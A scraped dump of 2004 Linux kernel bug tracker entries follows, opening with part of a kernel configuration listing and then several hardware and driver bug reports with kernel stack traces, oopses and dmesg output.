CONFIG_IP_NF_MATCH_RECENT=m CONFIG_IP_NF_MATCH_ECN=m CONFIG_IP_NF_MATCH_DSCP=m CONFIG_IP_NF_MATCH_AH_ESP=m CONFIG_IP_NF_MATCH_LENGTH=m CONFIG_IP_NF_MATCH_TTL=m CONFIG_IP_NF_MATCH_TCPMSS=m CONFIG_IP_NF_MATCH_HELPER=m CONFIG_IP_NF_MATCH_STATE=m CONFIG_IP_NF_MATCH_CONNTRACK=m CONFIG_IP_NF_MATCH_OWNER=m CONFIG_IP_NF_FILTER=m CONFIG_IP_NF_TARGET_REJECT=m CONFIG_IP_NF_NAT=m CONFIG_IP_NF_NAT_NEEDED=y CONFIG_IP_NF_TARGET_MASQUERADE=m CONFIG_IP_NF_TARGET_REDIRECT=m # CONFIG_IP_NF_TARGET_NETMAP is not set # CONFIG_IP_NF_TARGET_SAME is not set # CONFIG_IP_NF_NAT_LOCAL is not set # CONFIG_IP_NF_NAT_SNMP_BASIC is not set CONFIG_IP_NF_NAT_IRC=m CONFIG_IP_NF_NAT_FTP=m CONFIG_IP_NF_NAT_TFTP=m CONFIG_IP_NF_NAT_AMANDA=m CONFIG_IP_NF_MANGLE=m CONFIG_IP_NF_TARGET_TOS=m CONFIG_IP_NF_TARGET_ECN=m CONFIG_IP_NF_TARGET_DSCP=m CONFIG_IP_NF_TARGET_MARK=m # CONFIG_IP_NF_TARGET_CLASSIFY is not set CONFIG_IP_NF_TARGET_LOG=m CONFIG_IP_NF_TARGET_ULOG=m CONFIG_IP_NF_TARGET_TCPMSS=m CONFIG_IP_NF_ARPTABLES=m CONFIG_IP_NF_ARPFILTER=m CONFIG_IP_NF_ARP_MANGLE=m # CONFIG_IP_NF_COMPAT_IPCHAINS is not set # CONFIG_IP_NF_COMPAT_IPFWADM is not set # CONFIG_IP_NF_TARGET_NOTRACK is not set CONFIG_IP_NF_RAW=m CONFIG_XFRM=y # CONFIG_XFRM_USER is not set # # SCTP Configuration (EXPERIMENTAL) # # CONFIG_IP_SCTP is not set # CONFIG_ATM is not set # CONFIG_BRIDGE is not set # CONFIG_VLAN_8021Q is not set # CONFIG_DECNET is not set # CONFIG_LLC2 is not set # CONFIG_IPX is not set # CONFIG_ATALK is not set # CONFIG_X25 is not set # CONFIG_LAPB is not set # CONFIG_NET_DIVERT is not set # CONFIG_ECONET is not set # CONFIG_WAN_ROUTER is not set # CONFIG_NET_FASTROUTE is not set # CONFIG_NET_HW_FLOWCONTROL is not set # # QoS and/or fair queueing # # CONFIG_NET_SCHED is not set # # Network testing # # CONFIG_NET_PKTGEN is not set # CONFIG_NETPOLL is not set # CONFIG_NET_POLL_CONTROLLER is not set # CONFIG_HAMRADIO is not set # CONFIG_IRDA is not set # CONFIG_BT is not set CONFIG_NETDEVICES=y CONFIG_DUMMY=m # CONFIG_BONDING is not set # CONFIG_EQUALIZER is not set # CONFIG_TUN is not set # CONFIG_NET_SB1000 is not set # # ARCnet devices # # CONFIG_ARCNET is not set # # Ethernet (10 or 100Mbit) # CONFIG_NET_ETHERNET=y CONFIG_MII=y # CONFIG_HAPPYMEAL is not set # CONFIG_SUNGEM is not set CONFIG_NET_VENDOR_3COM=y # CONFIG_EL1 is not set # CONFIG_EL2 is not set # CONFIG_ELPLUS is not set # CONFIG_EL16 is not set # CONFIG_EL3 is not set # CONFIG_3C515 is not set CONFIG_VORTEX=y # CONFIG_TYPHOON is not set # CONFIG_LANCE is not set # CONFIG_NET_VENDOR_SMC is not set # CONFIG_NET_VENDOR_RACAL is not set # # Tulip family network device support # # CONFIG_NET_TULIP is not set # CONFIG_AT1700 is not set # CONFIG_DEPCA is not set # CONFIG_HP100 is not set # CONFIG_NET_ISA is not set CONFIG_NET_PCI=y # CONFIG_PCNET32 is not set # CONFIG_AMD8111_ETH is not set # CONFIG_ADAPTEC_STARFIRE is not set # CONFIG_AC3200 is not set # CONFIG_APRICOT is not set # CONFIG_B44 is not set # CONFIG_FORCEDETH is not set # CONFIG_CS89x0 is not set # CONFIG_DGRS is not set CONFIG_EEPRO100=y # CONFIG_EEPRO100_PIO is not set # CONFIG_E100 is not set # CONFIG_FEALNX is not set # CONFIG_NATSEMI is not set # CONFIG_NE2K_PCI is not set # CONFIG_8139CP is not set # CONFIG_8139TOO is not set # CONFIG_SIS900 is not set # CONFIG_EPIC100 is not set # CONFIG_SUNDANCE is not set # CONFIG_TLAN is not set # CONFIG_VIA_RHINE is not set # CONFIG_NET_POCKET is not set # # Ethernet (1000 Mbit) # # CONFIG_ACENIC is not set # CONFIG_DL2K is not set # CONFIG_E1000 is not set # CONFIG_NS83820 is not set # CONFIG_HAMACHI is not set # CONFIG_YELLOWFIN is not set # CONFIG_R8169 is not set # CONFIG_SK98LIN is not set # CONFIG_TIGON3 is not set # # Ethernet (10000 Mbit) # # CONFIG_IXGB is not set # CONFIG_S2IO is not set # # Token Ring devices # # CONFIG_TR is not set # # Wireless LAN (non-hamradio) # # CONFIG_NET_RADIO is not set # # Wan interfaces # # CONFIG_WAN is not set # CONFIG_FDDI is not set # CONFIG_HIPPI is not set # CONFIG_PLIP is not set # CONFIG_PPP is not set # CONFIG_SLIP is not set # CONFIG_NET_FC is not set # CONFIG_SHAPER is not set # CONFIG_NETCONSOLE is not set # # ISDN subsystem # # CONFIG_ISDN is not set # # Telephony Support # # CONFIG_PHONE is not set # # Input device support # CONFIG_INPUT=y # # Userland interfaces # CONFIG_INPUT_MOUSEDEV=y CONFIG_INPUT_MOUSEDEV_PSAUX=y CONFIG_INPUT_MOUSEDEV_SCREEN_X=1600 CONFIG_INPUT_MOUSEDEV_SCREEN_Y=1200 # CONFIG_INPUT_JOYDEV is not set # CONFIG_INPUT_TSDEV is not set CONFIG_INPUT_EVDEV=m # CONFIG_INPUT_EVBUG is not set # # Input I/O drivers # # CONFIG_GAMEPORT is not set CONFIG_SOUND_GAMEPORT=y CONFIG_SERIO=y CONFIG_SERIO_I8042=y CONFIG_SERIO_SERPORT=y # CONFIG_SERIO_CT82C710 is not set # CONFIG_SERIO_PARKBD is not set # CONFIG_SERIO_PCIPS2 is not set # # Input Device Drivers # CONFIG_INPUT_KEYBOARD=y CONFIG_KEYBOARD_ATKBD=y # CONFIG_KEYBOARD_SUNKBD is not set # CONFIG_KEYBOARD_LKKBD is not set # CONFIG_KEYBOARD_XTKBD is not set # CONFIG_KEYBOARD_NEWTON is not set CONFIG_INPUT_MOUSE=y CONFIG_MOUSE_PS2=y # CONFIG_MOUSE_SERIAL is not set # CONFIG_MOUSE_INPORT is not set # CONFIG_MOUSE_LOGIBM is not set # CONFIG_MOUSE_PC110PAD is not set # CONFIG_MOUSE_VSXXXAA is not set # CONFIG_INPUT_JOYSTICK is not set # CONFIG_INPUT_TOUCHSCREEN is not set # CONFIG_INPUT_MISC is not set # # Character devices # CONFIG_VT=y CONFIG_VT_CONSOLE=y CONFIG_HW_CONSOLE=y # CONFIG_SERIAL_NONSTANDARD is not set # # Serial drivers # CONFIG_SERIAL_8250=y CONFIG_SERIAL_8250_CONSOLE=y CONFIG_SERIAL_8250_ACPI=y CONFIG_SERIAL_8250_NR_UARTS=4 # CONFIG_SERIAL_8250_EXTENDED is not set # # Non-8250 serial port support # CONFIG_SERIAL_CORE=y CONFIG_SERIAL_CORE_CONSOLE=y CONFIG_UNIX98_PTYS=y CONFIG_LEGACY_PTYS=y CONFIG_LEGACY_PTY_COUNT=256 CONFIG_PRINTER=m # CONFIG_LP_CONSOLE is not set CONFIG_PPDEV=m # CONFIG_TIPAR is not set # CONFIG_QIC02_TAPE is not set # # IPMI # # CONFIG_IPMI_HANDLER is not set # # Watchdog Cards # # CONFIG_WATCHDOG is not set # CONFIG_HW_RANDOM is not set CONFIG_NVRAM=m CONFIG_RTC=y # CONFIG_DTLK is not set # CONFIG_R3964 is not set # CONFIG_APPLICOM is not set # CONFIG_SONYPI is not set # # Ftape, the floppy tape device driver # CONFIG_AGP=m # CONFIG_AGP_ALI is not set # CONFIG_AGP_ATI is not set # CONFIG_AGP_AMD is not set # CONFIG_AGP_AMD64 is not set CONFIG_AGP_INTEL=m # CONFIG_AGP_INTEL_MCH is not set # CONFIG_AGP_NVIDIA is not set # CONFIG_AGP_SIS is not set # CONFIG_AGP_SWORKS is not set # CONFIG_AGP_VIA is not set # CONFIG_AGP_EFFICEON is not set CONFIG_DRM=y # CONFIG_DRM_TDFX is not set # CONFIG_DRM_GAMMA is not set # CONFIG_DRM_R128 is not set # CONFIG_DRM_RADEON is not set # CONFIG_DRM_I810 is not set # CONFIG_DRM_I830 is not set # CONFIG_DRM_MGA is not set # CONFIG_DRM_SIS is not set # CONFIG_MWAVE is not set # CONFIG_RAW_DRIVER is not set # CONFIG_HANGCHECK_TIMER is not set # # I2C support # CONFIG_I2C=m CONFIG_I2C_CHARDEV=m # # I2C Algorithms # CONFIG_I2C_ALGOBIT=m CONFIG_I2C_ALGOPCF=m # # I2C Hardware Bus support # CONFIG_I2C_ALI1535=m CONFIG_I2C_ALI1563=m CONFIG_I2C_ALI15X3=m CONFIG_I2C_AMD756=m CONFIG_I2C_AMD8111=m CONFIG_I2C_I801=m CONFIG_I2C_I810=m CONFIG_I2C_ISA=m CONFIG_I2C_NFORCE2=m CONFIG_I2C_PARPORT=m # CONFIG_I2C_PARPORT_LIGHT is not set CONFIG_I2C_PIIX4=m CONFIG_I2C_PROSAVAGE=m CONFIG_I2C_SAVAGE4=m CONFIG_SCx200_ACB=m CONFIG_I2C_SIS5595=m CONFIG_I2C_SIS630=m CONFIG_I2C_SIS96X=m CONFIG_I2C_VIA=m CONFIG_I2C_VIAPRO=m # CONFIG_I2C_VOODOO3 is not set # # Hardware Sensors Chip support # CONFIG_I2C_SENSOR=m CONFIG_SENSORS_ADM1021=m CONFIG_SENSORS_ASB100=m # CONFIG_SENSORS_DS1621 is not set # CONFIG_SENSORS_FSCHER is not set # CONFIG_SENSORS_GL518SM is not set CONFIG_SENSORS_IT87=m CONFIG_SENSORS_LM75=m CONFIG_SENSORS_LM78=m CONFIG_SENSORS_LM80=m CONFIG_SENSORS_LM83=m CONFIG_SENSORS_LM85=m CONFIG_SENSORS_LM90=m # CONFIG_SENSORS_MAX1619 is not set CONFIG_SENSORS_VIA686A=m CONFIG_SENSORS_W83781D=m CONFIG_SENSORS_W83L785TS=m CONFIG_SENSORS_W83627HF=m # # Other I2C Chip support # CONFIG_SENSORS_EEPROM=m CONFIG_SENSORS_PCF8574=m CONFIG_SENSORS_PCF8591=m # CONFIG_SENSORS_RTC8564 is not set CONFIG_I2C_DEBUG_CORE=y CONFIG_I2C_DEBUG_ALGO=y CONFIG_I2C_DEBUG_BUS=y CONFIG_I2C_DEBUG_CHIP=y # # Misc devices # # CONFIG_IBM_ASM is not set # # Multimedia devices # # CONFIG_VIDEO_DEV is not set # # Digital Video Broadcasting Devices # # CONFIG_DVB is not set # # Graphics support # CONFIG_FB=y # CONFIG_FB_PM2 is not set # CONFIG_FB_CYBER2000 is not set # CONFIG_FB_ASILIANT is not set # CONFIG_FB_IMSTT is not set # CONFIG_FB_VGA16 is not set CONFIG_FB_VESA=y CONFIG_VIDEO_SELECT=y # CONFIG_FB_HGA is not set # CONFIG_FB_RIVA is not set # CONFIG_FB_I810 is not set # CONFIG_FB_MATROX is not set # CONFIG_FB_RADEON_OLD is not set # CONFIG_FB_RADEON is not set # CONFIG_FB_ATY128 is not set # CONFIG_FB_ATY is not set # CONFIG_FB_SIS is not set # CONFIG_FB_NEOMAGIC is not set # CONFIG_FB_KYRO is not set # CONFIG_FB_3DFX is not set # CONFIG_FB_VOODOO1 is not set # CONFIG_FB_TRIDENT is not set # CONFIG_FB_VIRTUAL is not set # # Console display driver support # CONFIG_VGA_CONSOLE=y # CONFIG_MDA_CONSOLE is not set CONFIG_DUMMY_CONSOLE=y CONFIG_FRAMEBUFFER_CONSOLE=m CONFIG_PCI_CONSOLE=y CONFIG_FONTS=y CONFIG_FONT_8x8=y CONFIG_FONT_8x16=y CONFIG_FONT_6x11=y CONFIG_FONT_PEARL_8x8=y CONFIG_FONT_ACORN_8x8=y CONFIG_FONT_MINI_4x6=y CONFIG_FONT_SUN8x16=y CONFIG_FONT_SUN12x22=y # # Logo configuration # CONFIG_LOGO=y CONFIG_LOGO_LINUX_MONO=y CONFIG_LOGO_LINUX_VGA16=y CONFIG_LOGO_LINUX_CLUT224=y # # Sound # CONFIG_SOUND=y # # Advanced Linux Sound Architecture # CONFIG_SND=y CONFIG_SND_TIMER=y CONFIG_SND_PCM=y CONFIG_SND_HWDEP=y CONFIG_SND_RAWMIDI=y CONFIG_SND_SEQUENCER=y # CONFIG_SND_SEQ_DUMMY is not set CONFIG_SND_OSSEMUL=y CONFIG_SND_MIXER_OSS=y CONFIG_SND_PCM_OSS=y CONFIG_SND_SEQUENCER_OSS=y CONFIG_SND_RTCTIMER=y # CONFIG_SND_VERBOSE_PRINTK is not set # CONFIG_SND_DEBUG is not set # # Generic devices # CONFIG_SND_MPU401_UART=y # CONFIG_SND_DUMMY is not set # CONFIG_SND_VIRMIDI is not set # CONFIG_SND_MTPAV is not set # CONFIG_SND_SERIAL_U16550 is not set CONFIG_SND_MPU401=y # # ISA devices # # CONFIG_SND_AD1816A is not set # CONFIG_SND_AD1848 is not set # CONFIG_SND_CS4231 is not set # CONFIG_SND_CS4232 is not set # CONFIG_SND_CS4236 is not set # CONFIG_SND_ES968 is not set # CONFIG_SND_ES1688 is not set # CONFIG_SND_ES18XX is not set # CONFIG_SND_GUSCLASSIC is not set # CONFIG_SND_GUSEXTREME is not set # CONFIG_SND_GUSMAX is not set # CONFIG_SND_INTERWAVE is not set # CONFIG_SND_INTERWAVE_STB is not set # CONFIG_SND_OPTI92X_AD1848 is not set # CONFIG_SND_OPTI92X_CS4231 is not set # CONFIG_SND_OPTI93X is not set # CONFIG_SND_SB8 is not set # CONFIG_SND_SB16 is not set # CONFIG_SND_SBAWE is not set # CONFIG_SND_WAVEFRONT is not set # CONFIG_SND_ALS100 is not set # CONFIG_SND_AZT2320 is not set # CONFIG_SND_CMI8330 is not set # CONFIG_SND_DT019X is not set # CONFIG_SND_OPL3SA2 is not set # CONFIG_SND_SGALAXY is not set # CONFIG_SND_SSCAPE is not set # # PCI devices # CONFIG_SND_AC97_CODEC=y # CONFIG_SND_ALI5451 is not set # CONFIG_SND_ATIIXP is not set # CONFIG_SND_AU8810 is not set # CONFIG_SND_AU8820 is not set # CONFIG_SND_AU8830 is not set # CONFIG_SND_AZT3328 is not set # CONFIG_SND_BT87X is not set # CONFIG_SND_CS46XX is not set # CONFIG_SND_CS4281 is not set CONFIG_SND_EMU10K1=y # CONFIG_SND_KORG1212 is not set # CONFIG_SND_MIXART is not set # CONFIG_SND_NM256 is not set # CONFIG_SND_RME32 is not set # CONFIG_SND_RME96 is not set # CONFIG_SND_RME9652 is not set # CONFIG_SND_HDSP is not set # CONFIG_SND_TRIDENT is not set # CONFIG_SND_YMFPCI is not set # CONFIG_SND_ALS4000 is not set # CONFIG_SND_CMIPCI is not set # CONFIG_SND_ENS1370 is not set # CONFIG_SND_ENS1371 is not set # CONFIG_SND_ES1938 is not set # CONFIG_SND_ES1968 is not set # CONFIG_SND_MAESTRO3 is not set # CONFIG_SND_FM801 is not set # CONFIG_SND_ICE1712 is not set # CONFIG_SND_ICE1724 is not set # CONFIG_SND_INTEL8X0 is not set # CONFIG_SND_INTEL8X0M is not set # CONFIG_SND_SONICVIBES is not set # CONFIG_SND_VIA82XX is not set # CONFIG_SND_VX222 is not set # # ALSA USB devices # # CONFIG_SND_USB_AUDIO is not set # # Open Sound System # # CONFIG_SOUND_PRIME is not set # # USB support # CONFIG_USB=m # CONFIG_USB_DEBUG is not set # # Miscellaneous USB options # CONFIG_USB_DEVICEFS=y # CONFIG_USB_BANDWIDTH is not set # CONFIG_USB_DYNAMIC_MINORS is not set # # USB Host Controller Drivers # CONFIG_USB_EHCI_HCD=m # CONFIG_USB_EHCI_SPLIT_ISO is not set # CONFIG_USB_EHCI_ROOT_HUB_TT is not set CONFIG_USB_OHCI_HCD=m CONFIG_USB_UHCI_HCD=m # # USB Device Class drivers # # CONFIG_USB_AUDIO is not set # CONFIG_USB_BLUETOOTH_TTY is not set # CONFIG_USB_MIDI is not set # CONFIG_USB_ACM is not set CONFIG_USB_PRINTER=m CONFIG_USB_STORAGE=m # CONFIG_USB_STORAGE_DEBUG is not set CONFIG_USB_STORAGE_DATAFAB=y CONFIG_USB_STORAGE_FREECOM=y CONFIG_USB_STORAGE_ISD200=y CONFIG_USB_STORAGE_DPCM=y CONFIG_USB_STORAGE_HP8200e=y CONFIG_USB_STORAGE_SDDR09=y CONFIG_USB_STORAGE_SDDR55=y CONFIG_USB_STORAGE_JUMPSHOT=y # # USB Human Interface Devices (HID) # CONFIG_USB_HID=m CONFIG_USB_HIDINPUT=y # CONFIG_HID_FF is not set CONFIG_USB_HIDDEV=y # # USB HID Boot Protocol drivers # CONFIG_USB_KBD=m CONFIG_USB_MOUSE=m # CONFIG_USB_AIPTEK is not set CONFIG_USB_WACOM=m # CONFIG_USB_KBTAB is not set # CONFIG_USB_POWERMATE is not set # CONFIG_USB_MTOUCH is not set # CONFIG_USB_EGALAX is not set # CONFIG_USB_XPAD is not set # CONFIG_USB_ATI_REMOTE is not set # # USB Imaging devices # # CONFIG_USB_MDC800 is not set # CONFIG_USB_MICROTEK is not set # CONFIG_USB_HPUSBSCSI is not set # # USB Multimedia devices # # CONFIG_USB_DABUSB is not set # # Video4Linux support is needed for USB Multimedia device support # # # USB Network adaptors # # CONFIG_USB_CATC is not set # CONFIG_USB_KAWETH is not set # CONFIG_USB_PEGASUS is not set # CONFIG_USB_RTL8150 is not set # CONFIG_USB_USBNET is not set # # USB port drivers # # CONFIG_USB_USS720 is not set # # USB Serial Converter support # # CONFIG_USB_SERIAL is not s</t>
  </si>
  <si>
    <t>might_sleep warning when setting up IPSec with IPCOMP</t>
  </si>
  <si>
    <t>2004-07-02 10:32 UTC</t>
  </si>
  <si>
    <t>2004-09-09 23:11 UTC</t>
  </si>
  <si>
    <t>Linux 2.6.7 on x86, UP preempt Using OpenSWAN for IPSec tunnel with IP-Compression enabled. Often gives the following warning shortly after a connection has been set up: I'm not exactly sure whether this is cryptoapi or the compression module or IPCOMP's fault. Jul 2 18:39:04 websrv Debug: sleeping function called from invalid context at mm/slab.c:1994 Jul 2 18:39:04 websrv in_atomic():1, irqs_disabled():0 Jul 2 18:39:04 websrv [&lt;c0106c37&gt;] dump_stack+0x17/0x20 Jul 2 18:39:04 websrv [&lt;c0118fb4&gt;] __might_sleep+0xb4/0xe0 Jul 2 18:39:04 websrv [&lt;c0139fbc&gt;] kmem_cache_alloc+0x5c/0x60 Jul 2 18:39:04 websrv [&lt;c0147bc0&gt;] __get_vm_area+0x20/0xf0 Jul 2 18:39:04 websrv [&lt;c0147cb4&gt;] get_vm_area+0x24/0x30 Jul 2 18:39:04 websrv [&lt;c0147f1c&gt;] __vmalloc+0x3c/0x100 Jul 2 18:39:04 websrv [&lt;c01ecdca&gt;] deflate_comp_init+0x4a/0xf0 Jul 2 18:39:04 websrv [&lt;c01ecf44&gt;] deflate_compress+0x24/0x80 Jul 2 18:39:04 websrv [&lt;c01e8a84&gt;] crypto_compress+0x24/0x30 Jul 2 18:39:04 websrv [&lt;c031744c&gt;] ipcomp_compress+0x6c/0x110 Jul 2 18:39:04 websrv [&lt;c0317681&gt;] ipcomp_output+0xc1/0x370 Jul 2 18:39:04 websrv [&lt;c02e684e&gt;] dst_output+0xe/0x30 Jul 2 18:39:04 websrv [&lt;c02d684a&gt;] nf_hook_slow+0xfa/0x170 Jul 2 18:39:04 websrv [&lt;c02e4d12&gt;] ip_queue_xmit+0x452/0x540 Jul 2 18:39:04 websrv [&lt;c02f48af&gt;] tcp_transmit_skb+0x3ef/0x660 Jul 2 18:39:04 websrv [&lt;c02f558b&gt;] tcp_write_xmit+0x15b/0x2c0 Jul 2 18:39:04 websrv [&lt;c02ea255&gt;] tcp_sendmsg+0x4e5/0x1030 Jul 2 18:39:04 websrv [&lt;c0309ec7&gt;] inet_sendmsg+0x47/0x60 Jul 2 18:39:04 websrv [&lt;c02c5fee&gt;] sock_aio_write+0xae/0xd0 Jul 2 18:39:04 websrv [&lt;c014d1b6&gt;] do_sync_write+0x76/0xb0 Jul 2 18:39:04 websrv [&lt;c014d2bb&gt;] vfs_write+0xcb/0xf0 Jul 2 18:39:04 websrv [&lt;c014d375&gt;] sys_write+0x35/0x60 Jul 2 18:39:04 websrv [&lt;c0105e3d&gt;] sysenter_past_esp+0x52/0x71</t>
  </si>
  <si>
    <t>2007-02-15 22:13 UTC</t>
  </si>
  <si>
    <t>Konstantin Karasyov</t>
  </si>
  <si>
    <t>speedstep-ich Oops error with Mobile P4 HT</t>
  </si>
  <si>
    <t>2004-07-04 06:48 UTC</t>
  </si>
  <si>
    <t>Boris Fersing</t>
  </si>
  <si>
    <t>2004-09-08 02:43 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: Dell Inspiron 5150 with Mobile P4 HT. Software Environment: Problem Description: electron root # modprobe speedstep-ich Oops: 0000 [#1] PREEMPT SMP Modules linked in: speedstep_ich speedstep_lib nvidia tun prism54 firmware_class CPU: 0 EIP: 0060:[&lt;c0413153&gt;] Tainted: P EFLAGS: 00010246 (2.6.7-gentoo-r8) EIP is at cpufreq_notify_transition+0xbd/0x13e eax: 00000001 ebx: c05d16c4 ecx: 00000001 edx: 00000000 esi: eb221de4 edi: 00000000 ebp: 00000002 esp: eb221da4 ds: 007b es: 007b ss: 0068 Process modprobe (pid: 11236, threadinfo=eb220000 task=ee41ab50) Stack: 00000000 eb221de4 eb221de4 eb221ddc eb221ddc eb221ddc f0ee845c eb221de4 00000000 002ecade 00000001 eb221de0 00000001 00000003 00000003 00000000 00000001 002ecade 002ecade 00000200 00000001 00000000 efcdd138 00000001 Call Trace: [&lt;f0ee845c&gt;] speedstep_target+0x1d8/0x255 [speedstep_ich] [&lt;c0412a67&gt;] __cpufreq_driver_target+0x3c/0x40 [&lt;c04135b2&gt;] cpufreq_governor_performance+0x32/0x34 [&lt;c0412b4f&gt;] __cpufreq_governor+0x6d/0x136 [&lt;c0412f11&gt;] __cpufreq_set_policy+0x108/0x171 [&lt;c0412fc6&gt;] cpufreq_set_policy+0x4c/0x8c [&lt;f0ee85ea&gt;] speedstep_get+0x0/0xe [speedstep_ich] [&lt;c04124a1&gt;] cpufreq_add_dev+0x225/0x390 [&lt;c04126ff&gt;] handle_update+0x0/0x5 [&lt;c034ec0b&gt;] sysdev_driver_register+0x7e/0xc9 [&lt;c041326a&gt;] cpufreq_register_driver+0x96/0x15e [&lt;f0eeb039&gt;] speedstep_init+0x39/0x54 [speedstep_ich] [&lt;c013867c&gt;] sys_init_module+0x130/0x25e [&lt;c010605d&gt;] sysenter_past_esp+0x52/0x71 Code: 8b 47 18 85 c0 74 07 8b 4e 04 39 c1 75 2d 89 74 24 08 c7 44 Segmentation fault Steps to reproduce: modprobe speedstep-ich</t>
  </si>
  <si>
    <t>Kernel help says second extended fs support is required</t>
  </si>
  <si>
    <t>2.6.5-r1</t>
  </si>
  <si>
    <t>2004-07-04 10:04 UTC</t>
  </si>
  <si>
    <t>Quitch</t>
  </si>
  <si>
    <t>2004-07-11 15:09 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: x86 Software Environment: Gentoo LiveCD Problem Description: Looking at the help for the "second extended fs support" option under File Systems, you are told that unless you intend to run under a DOS partition you will need to enable this. I have been informed (being new to Gentoo) that in fact you only need it for ext2 support. The Help doc should be updated to reflect this. Obviously, were it required by all the other file systems, or for Gentoo to run, they should all be listed under ext2 in the tree structure, with their options disappearing when ext2 does. The bug was filed with the Gentoo Docs team, but I was informed it needed to be brought here. http://bugs.gentoo.org/show_bug.cgi?id=53412 Steps to reproduce: Go into the File System section of the Kernel config menu and pull up the Help on ext2</t>
  </si>
  <si>
    <t>APIC error - Only one CPU initialised</t>
  </si>
  <si>
    <t>tested 2.6.4, 2.6.5 &amp; 2.6.7</t>
  </si>
  <si>
    <t>2004-07-04 11:23 UTC</t>
  </si>
  <si>
    <t>Michael Hammer</t>
  </si>
  <si>
    <t>2004-07-05 02:20 UTC</t>
  </si>
  <si>
    <t>Distribution: suse 9.1 Hardware Environment: Mainboard: ASUS A7M266-D CPUs: 2x AMD Athlon MP 2800+ Software Environment: BIOS 1011.003 Problem Description: APIC error on CPU0: 04(04) Here is the part of the boot.msg ... &lt;6&gt;APIC error on CPU0: 04(04) &lt;6&gt;APIC error on CPU0: 00(04) &lt;6&gt;APIC error on CPU0: 04(04) &lt;6&gt;APIC error on CPU0: 00(04) &lt;4&gt;Not responding. &lt;4&gt;CPU #1 not responding - cannot use it. &lt;6&gt;Total of 1 processors activated (4194.30 BogoMIPS). ... Steps to reproduce: Every Reboot :-(</t>
  </si>
  <si>
    <t>deadlock when resume from s3</t>
  </si>
  <si>
    <t>latest acpi test tree</t>
  </si>
  <si>
    <t>2004-07-05 23:49 UTC</t>
  </si>
  <si>
    <t>2004-07-23 10:37 UTC</t>
  </si>
  <si>
    <t>When resume from s3, system deadlock to handle GPE interrupt.</t>
  </si>
  <si>
    <t>DMA timeout error</t>
  </si>
  <si>
    <t>2.6.5, 2.6.6, 2.6.7, 2.4.18, 2.4.26</t>
  </si>
  <si>
    <t>2004-07-06 08:25 UTC</t>
  </si>
  <si>
    <t>G</t>
  </si>
  <si>
    <t>2004-10-01 07:47 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Sarge, Debian Woody, SuSE 9.1 Hardware Environment: CPU: PentiumIV 2.4G, chipset: Intel 865, disk: Seagate 120G Software Environment: Linus kernel, Debian kernel, SuSE kernel Problem Description: This is an old bug, first described in October 2003 (Google): http://www.uwsg.iu.edu/hypermail/linux/kernel/0310.3/0063.html My 120G Seagate disk doesn't work with Linux at all. But it works perfectly with Windows. I found that if I switch off DMA it begins to work again. This Seagate disk is hdc. I boot from hda which is a 120G IBM drive (works perfectly). CDROM is hdd, which does not work only if the Seagate disk is attached. If I try to do an 'fdisk -l /dev/hdc', dma_timer_expiry is shown after a short period. If the Seagate disk is attached, my CDROM drive is visible, but it is unable to read anything. If I switch off DMA for both drives, they began to work correctly. dmesg (after first login): [...] Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ICH5: IDE controller at PCI slot 0000:00:1f.1 PCI: Enabling device 0000:00:1f.1 (0005 -&gt; 0007) ICH5: chipset revision 2 ICH5: not 100% native mode: will probe irqs later ide0: BM-DMA at 0xfc00-0xfc07, BIOS settings: hda:DMA, hdb:pio ide1: BM-DMA at 0xfc08-0xfc0f, BIOS settings: hdc:DMA, hdd:DMA hda: ST3120026A, ATA DISK drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 hdc: IC35L120AVV207-1, ATA DISK drive hdd: HL-DT-ST RW/DVD GCC-4320B, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 hda: max request size: 1024KiB hda: 234441648 sectors (120034 MB) w/8192KiB Cache, CHS=16383/255/63, UDMA(100) hda: hda1 hda2 hda3 hda4 &lt; hda5 hda6 &gt; hdc: max request size: 1024KiB hdc: 241254720 sectors (123522 MB) w/7965KiB Cache, CHS=16383/255/63, UDMA(100) hdc:&lt;4&gt;hdc: dma_timer_expiry: dma status == 0x61 hdc: DMA timeout error hdc: dma timeout error: status=0x58 { DriveReady SeekComplete DataRequest } hdc1 mice: PS/2 mouse device common for all mice [...] Seagate disk spec: Model Number: IC35L120AVV207-1 Serial Number: VNVD05G4GWAGNG Firmware Revision: V24OA66A I tried to attach the Seagate disk as primary slave (hdb). In this case system boots up correctly, hda is okay, but hdb is unreachable until I switch off dma. In this case secondary ide devices work perfectly. I tried to exchange the Seagate disk to an IBM 40G, with that all configurations are flawless. I tried changing cables, with no luck. I tried setting the BIOS setup IDE mode to native and legacy, but it doesn't solve the problem. (With native mode set an additional error message is given: it complains that it must disable irq18, because of an unexpected interrupt.) Steps to reproduce: See above. I don't know if it's a Seagate specific problem, but as I said, Windows gives no error and handles all drives correctly (with dma).</t>
  </si>
  <si>
    <t>Tyan Thunder K7 hangs on shutdown / reboot</t>
  </si>
  <si>
    <t>2004-07-06 09:23 UTC</t>
  </si>
  <si>
    <t>Marcel Weber</t>
  </si>
  <si>
    <t>2004-08-29 10:01 UTC</t>
  </si>
  <si>
    <t>acpi_power-off</t>
  </si>
  <si>
    <t>Distribution: Debian Sid (unstable) Hardware Environment: Tyan Thunder K7 (s2462 with latest 2.14 Bios), Dual Athlon MP 1200 MHz, Ati Radeon 9600, Sounblaster PCI 128 (ens1371) lspci 0000:00:00.0 Host bridge: Advanced Micro Devices [AMD] AMD-760 MP [IGD4-2P] System Controller (rev 11) 0000:00:01.0 PCI bridge: Advanced Micro Devices [AMD] AMD-760 MP [IGD4-2P] AGP Bridge 0000:00:07.0 ISA bridge: Advanced Micro Devices [AMD] AMD-766 [ViperPlus] ISA (rev 02) 0000:00:07.1 IDE interface: Advanced Micro Devices [AMD] AMD-766 [ViperPlus] IDE (rev 01) 0000:00:07.3 Bridge: Advanced Micro Devices [AMD] AMD-766 [ViperPlus] ACPI (rev 01) 0000:00:07.4 USB Controller: Advanced Micro Devices [AMD] AMD-766 [ViperPlus] USB (rev 07) 0000:00:0b.0 Multimedia audio controller: Ensoniq ES1371 [AudioPCI-97] (rev 06) 0000:00:0d.0 SCSI storage controller: Adaptec AIC-7899P U160/m (rev 01) 0000:00:0d.1 SCSI storage controller: Adaptec AIC-7899P U160/m (rev 01) 0000:00:0f.0 Ethernet controller: 